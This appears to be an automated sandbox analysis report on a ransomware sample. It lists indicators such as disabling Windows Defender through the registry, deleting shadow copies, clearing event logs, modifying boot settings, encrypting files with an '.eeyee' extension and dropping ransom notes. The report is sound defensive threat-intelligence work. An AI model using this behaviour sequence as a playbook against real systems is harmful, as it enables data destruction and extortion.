Analysis Overview
SHA256
9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c
Threat Level: Known bad
The file 9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Hive
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Runs ping.exe
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 10:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 10:14
Reported
2022-01-13 10:20
Platform
win7-en-20211208
Max time kernel
142s
Max time network
126s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_PwL0QWpypDM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_elbRtZjMEVc0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\SwitchEnable.aiff.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_qkY1C-Wo81I0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE01191_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_RUnrzVneXFQ0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_say5SXtNznY0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_zlC-5AfZ_qo0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_pC8Elp-wOLQ0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_p0LYe3sw5fc0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_lRep-RdBiUM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_TFZWqzYAjWk0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_4wW3Isjg0Jw0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_D5R7F0Gy5CU0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00543_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_ftmOd__2tso0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01660_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_foqe8mtL_HI0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_nsoLvIBQ7qE0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_aOex129pous0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_nzGtCcuZkkA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_Ei0BqjnKHXo0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_LGaxjwMahv40.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00074_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_lAf6XOP3MpA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_6bLFuSbRBks0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_itDGzwaPX1s0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_UM9WtnIn7fk0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\HORN.WAV.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_yJztMIYeQLI0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_J3A7hBPaMGo0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_IbDY3e6yE0s0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_2Yo_J7wQ9SM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21300_.GIF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_qNxlTYb0heA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_e9hmKcH9EYg0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_DG9J5eiDGqM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Araguaina.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_NWN4rQNjMZQ0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_aXaTUbFUd5Y0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_edphHBkK37g0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_MP5Rj_qQI5E0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_zS5JUFRfXTA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_zaopr_CP6WM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_xqXiIXXul500.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_Q69SE9dYQ880.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\es-ES\Sidebar.exe.mui | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00345_.WMF.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_yR5IZs_6Qlk0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_X_WmpDG3uZk0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab__yJTlwJ9sOs0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Sofia.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_qyu5BxbZyag0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_XPL0HxzHU9I0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_r-bqDAvCbhA0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\MENUS.JS.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_wnrWkxknZAw0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_W4u7jsSBHX80.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar.atbdnTblon9BCDNHXn-Zi4xhv_qYpMHot7jnPmqa1ab_dkjZarU-aE00.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
